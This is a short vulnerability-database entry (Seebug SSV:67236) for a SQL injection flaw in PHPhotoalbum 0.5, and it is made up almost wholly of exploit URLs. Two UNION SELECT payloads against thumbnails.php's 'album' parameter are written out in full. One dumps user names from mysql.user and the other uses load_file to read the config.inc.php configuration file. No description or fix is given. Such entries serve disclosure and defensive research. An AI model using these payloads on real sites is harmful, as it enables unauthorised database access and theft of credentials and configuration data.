PHPhotoalbum 0.5 - SQL Injection Vulnerability

2014-07-01T00:00:00
ID SSV:67236
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Title: PHPhotoalbum Remote sql injection Vulnerability
# Tested on: windows

http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+user+from+mysql.user--



http://server/PHPhotoalbum/thumbnails.php?album=-1+union+select+load_file(/directory hex/config.inc.php)+from+mysql.user--